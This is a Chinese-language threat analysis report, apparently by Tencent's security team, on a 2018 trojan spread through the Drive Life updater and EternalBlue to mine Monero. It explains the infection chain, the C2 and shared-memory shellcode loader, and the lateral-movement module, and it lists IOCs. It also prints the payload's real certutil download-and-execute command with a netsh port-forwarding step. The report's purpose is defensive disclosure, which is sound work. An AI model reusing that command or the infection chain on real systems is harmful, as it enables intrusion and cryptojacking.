freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    “驱动人生”木马详细分析报告 2小时感染10万台电脑挖门罗币
    2018-12-15 04:37:43
    所属地 广东省

    一、概述

    12月14日下午,腾讯安全御见威胁情报中心监测发现,一款通过“驱动人生”升级通道,并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发,仅2个小时受攻击用户就高达10万。 

    “驱动人生”木马会利用高危漏洞在企业内网呈蠕虫式传播,并进一步下载云控木马,对企业信息安全威胁巨大,企业用户须重点关注。

    该病毒爆发刚好是周末时间,令企业网管猝不及防,周一工作日员工电脑开机后,建议立刻查杀病毒,再使用杀毒软件的漏洞修复功能安装系统补丁。个人电脑用户使用腾讯电脑管家即可防御。 

    本次病毒爆发有三个特点:

    1.驱动人生升级通道传播的病毒会在中毒电脑安装云控木马;

    2.病毒会利用永恒之蓝漏洞在局域网内主动扩散;

    3.通过云端控制收集中毒电脑部分信息,接受云端指令在中毒电脑进行门罗币挖矿。 

    1.png

     木马攻击流程图

    二、详细分析

    dtlupg.exe访问以下url下载病毒
    hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe
    hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

    (注意,为避免网友点击以上链接可以直接下载病毒程序,对部分字符做了隐藏处理)

    病毒文件释放在:

    C:\Program Files (x86)\DTLSoft\rili\Updater\ctrlf\f79cb9d2893b254cc75dfb7f3e454a69.exe等位置执行。

     

    f79cb9d2893b254cc75dfb7f3e454a69.exe  运行后最终释放出 C:\WINDOWS\Temp\svvhost.exe

    (MD5:2E9710A4B9CBA3CD11E977AF87570E3B)运行,svvhost.exe打包了“永恒之蓝”等漏洞攻击工具在内外网进一步扩散。

    2.1 病毒母体

    F79CB9D2893B254CC75DFB7F3E454A69.exe

    运行后将自身拷贝到C:\windows\system32\svhost.exe,安装为服务并启动,服务名为Ddiver,并在随后拉起云控模块svhhost.exe、攻击模块svvhost.exe。

    运行时先检测互斥体,确定是否已感染过。

    2.png


    通过检测以下进程将杀软信息搜集准备上传。

    360tray.exe|360sd.exe|avp.exe|KvMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe

    3.png

     

    检测到任务管理器及游戏进程则将云控模块svhhost.exe退出。

    4.png

     

    打开互斥体,对象名称为"I am tHe xmr reporter",xmr意指xmrig.exe矿机。

    5.png

     搜集系统敏感信息上传到hxxp://i.haqo.net/i.png,并接受返回的云控代码等待执行。

    6.png


    母体设置进程共享内存HSKALWOEDJSLALQEOD

    7.png

    2.2 挖矿

    云控木马svhhost.exe其主要功能是,从母体进程svhost.exe共享内存中读取shellcode解密并执行,每隔2000秒读取一次共享内存中的shellcode进行解密执行,共享内存名为HSKALWOEDJSLALQEOD,目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行

    8.png

    云控木马执行流程

    云控木马运行后会创建一个线程,该线程函数主要功能是判断进程svhost.exe(母体进程)是否存在,不存在的话则启动该进程,接下来要读取的共享内存数据就是从该进程进行读取

    9.png

    创建线程判断母体进程是否存在

     调用OpenFileMappingA打开共享内存,读取共享内存数据

    10.png

    读取共享内存数据

     调用RtlDecompressBuffer函数解压共享内存中的数据,为下一步执行做准备

    11.png

    解压共享内存数据

     

    共享内存数据加压完后会执行,目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行


    12.png

    执行shellcode


    13.png


    尝试挖矿时通信IP为172.105.204.237

    14.png

    2.3 攻击模块

    攻击模块从地址hxxp://dl.haqo.net/eb.exez下载,作为子进程Svvhost.Exe启动,分析发现该文件是通过python实现的“永恒之蓝”漏洞利用模块压缩打包程序。

    子进程Svvhost.Exe为将python实现的永恒之蓝漏洞利用模块压缩打包程序。

    15.png

    Mysmb.pyo为攻击时扫描代码。

    16.png

    GitHub上也可以看到相关开源代码

    17.png

    扫描内网445端口进行攻击

    18.png


    不仅攻击内网漏洞机器,还随机找几个外网IP尝试攻击,1次攻击完后沉默20分钟

    19.png


    攻击成功后paylaod在中招机器执行以下命令进行内网扩散传播

    cmd.exe /c certutil -urlcache -split -fhttp://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewalladd portopening tcp 65531 DNS&netsh interface portproxy add v4tov4listenport=65531 connectaddress=1.1.1.1 connectport=53

    安全建议

    1.      服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html

    2.      企业用户在周一上班后,建议使用腾讯御点查杀病毒(个人用户可使用腾讯电脑管家),然后使用漏洞修复功能,修复全网终端存在的系统高危漏洞;

    3.      服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;

    4.      使用杀毒软件拦截可能的病毒攻击;

    5.      推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。

    3.png

    IOCs

    域名

    i.haqo.net

    dl.haqo.net

     

    md5

    2e9710a4b9cba3cd11e977af87570e3b

    74e2a43b2b7c6e258b3a3fc2516c1235

    f79cb9d2893b254cc75dfb7f3e454a69

     

    URL

    hxxp://dl.haqo.net/eb.exez
    hxxp://i.haqo.net/i.png?ID= xxxxx


    # 高危漏洞 # 腾讯安全 # 永恒之蓝 # 腾讯御见威胁情报 # 驱动人生
    本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    + 加入我的收藏
    相关推荐
    • 0 文章数
    • 0 关注者